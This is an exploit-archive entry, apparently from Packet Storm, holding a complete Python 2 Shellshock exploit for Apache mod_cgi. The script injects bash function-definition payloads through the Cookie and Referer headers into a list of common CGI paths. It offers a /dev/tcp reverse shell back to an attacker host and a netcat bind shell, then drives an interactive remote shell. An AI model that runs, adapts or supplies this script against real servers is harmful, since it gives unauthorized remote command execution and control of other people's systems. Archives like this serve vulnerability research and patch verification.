Apache mod_cgi Remote Command Execution

2014-10-06T00:00:00
ID PACKETSTORM:128573
Type packetstorm
Reporter Federico Galatolo
Modified 2014-10-06T00:00:00

Description

                                        
                                            `#! /usr/bin/env python  
from socket import *  
from threading import Thread  
import thread, time, httplib, urllib, sys  
  
stop = False  
proxyhost = ""  
proxyport = 0  
  
def usage():  
print """  
  
Shellshock apache mod_cgi remote exploit  
  
Usage:  
./exploit.py var=<value>  
  
Vars:  
rhost: victim host  
rport: victim port for TCP shell binding  
lhost: attacker host for TCP shell reversing  
lport: attacker port for TCP shell reversing  
pages: specific cgi vulnerable pages (separated by comma)  
proxy: host:port proxy  
  
Payloads:  
"reverse" (unix unversal) TCP reverse shell (Requires: rhost, lhost, lport)  
"bind" (uses non-bsd netcat) TCP bind shell (Requires: rhost, rport)  
  
Example:  
  
./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234  
./exploit.py payload=bind rhost=1.2.3.4 rport=1234  
  
Credits:  
  
Federico Galatolo 2014  
"""  
sys.exit(0)  
  
def exploit(lhost,lport,rhost,rport,payload,pages):  
headers = {"Cookie": payload, "Referer": payload}  
  
for page in pages:  
if stop:  
return  
print "[-] Trying exploit on : "+page  
if proxyhost != "":  
c = httplib.HTTPConnection(proxyhost,proxyport)  
c.request("GET","http://"+rhost+page,headers=headers)  
res = c.getresponse()  
else:  
c = httplib.HTTPConnection(rhost)  
c.request("GET",page,headers=headers)  
res = c.getresponse()  
if res.status == 404:  
print "[*] 404 on : "+page  
time.sleep(1)  
  
  
args = {}  
  
for arg in sys.argv[1:]:  
ar = arg.split("=")  
args[ar[0]] = ar[1]  
try:  
args['payload']  
except:  
usage()  
  
if args['payload'] == 'reverse':  
try:  
lhost = args['lhost']  
lport = int(args['lport'])  
rhost = args['rhost']  
payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+str(lport)+" 0>&1 &"  
except:  
usage()  
elif args['payload'] == 'bind':  
try:  
rhost = args['rhost']  
rport = args['rport']  
payload = "() { :;}; /bin/bash -c 'nc -l -p "+rport+" -e /bin/bash &'"  
except:  
usage()  
else:  
print "[*] Unsupported payload"  
usage()  
  
try:  
pages = args['pages'].split(",")  
except:  
pages = ["/cgi-sys/entropysearch.cgi","/cgi-sys/defaultwebpage.cgi","/cgi-mod/index.cgi","/cgi-bin/test.cgi","/cgi-bin-sdb/printenv"]  
  
try:  
proxyhost,proxyport = args['proxy'].split(":")  
except:  
pass  
  
if args['payload'] == 'reverse':  
serversocket = socket(AF_INET, SOCK_STREAM)  
buff = 1024  
addr = (lhost, lport)  
serversocket.bind(addr)  
serversocket.listen(10)  
print "[!] Started reverse shell handler"  
thread.start_new_thread(exploit,(lhost,lport,rhost,0,payload,pages,))  
if args['payload'] == 'bind':  
serversocket = socket(AF_INET, SOCK_STREAM)  
addr = (rhost,int(rport))  
thread.start_new_thread(exploit,("",0,rhost,rport,payload,pages,))  
  
buff = 1024  
  
while True:  
if args['payload'] == 'reverse':  
clientsocket, clientaddr = serversocket.accept()  
print "[!] Successfully exploited"  
print "[!] Incoming connection from "+clientaddr[0]  
stop = True  
clientsocket.settimeout(3)  
while True:  
reply = raw_input(clientaddr[0]+"> ")  
clientsocket.sendall(reply+"\n")  
try:  
data = clientsocket.recv(buff)  
print data  
except:  
pass  
  
if args['payload'] == 'bind':  
try:  
serversocket = socket(AF_INET, SOCK_STREAM)  
time.sleep(1)  
serversocket.connect(addr)  
print "[!] Successfully exploited"  
print "[!] Connected to "+rhost  
stop = True  
serversocket.settimeout(3)  
while True:  
reply = raw_input(rhost+"> ")  
serversocket.sendall(reply+"\n")  
data = serversocket.recv(buff)  
print data  
except:  
pass  
  
`